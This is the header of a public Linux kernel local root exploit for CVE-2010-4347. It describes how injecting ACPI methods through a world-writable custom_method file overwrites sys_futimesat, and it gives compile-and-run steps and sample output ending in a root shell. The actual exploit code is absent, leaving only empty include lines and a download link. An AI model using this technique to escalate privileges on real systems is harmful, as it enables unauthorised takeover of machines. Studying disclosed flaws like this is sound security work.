/*
* american-sign-language.c |
* |
* Linux Kernel <> |
* Jon Oberheide |
* http://jon.oberheide.org |
* |
* Information: |
* |
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347 |
* |
* This custom_method file allows to inject custom ACPI methods into the ACPI |
* interpreter tables. This control file was introduced with world writeable |
* permissions in Linux Kernel 2.6.33. |
* |
* Usage: |
* |
* $ gcc american-sign-language.c -o american-sign-language |
* $ ./american-sign-language |
* [+] resolving required symbols... |
* [+] checking for world-writable custom_method... |
* [+] checking for an ACPI LID device... |
* [+] poisoning ACPI tables via custom_method... |
* [+] triggering ACPI payload via LID device... |
* [+] triggering exploit via futimesat... |
* [+] launching root shell! |
* # id |
* uid=0(root) gid=0(root) groups=0(root) |
* |
* Notes: |
* |
* This vuln allows us to write custom ACPI methods and load them into the |
* kernel as an unprivileged user. We compile some fancy ASL down to AML |
* that overrides the ACPI method used when the status of the LID device is |
* queried (eg. 'open' or 'closed' lid on a laptop). When the method is |
* triggered, it overlays an OperationRegion on the physical address where |
* sys_futimesat is located and overwrites the memory via the Store to |
* escalate privileges whenever sys_futimesat is called. |
* |
* The payload is 64-bit only and depends on the existence of a LID device |
* (eg. laptop), but the exploit will still tell you if you're vulnerable |
* regardless. If you don't know how to work around these limitations, you |
* probably shouldn't be running this in the first place. :-P |
* |
* Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants |
*/ |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include
Download Full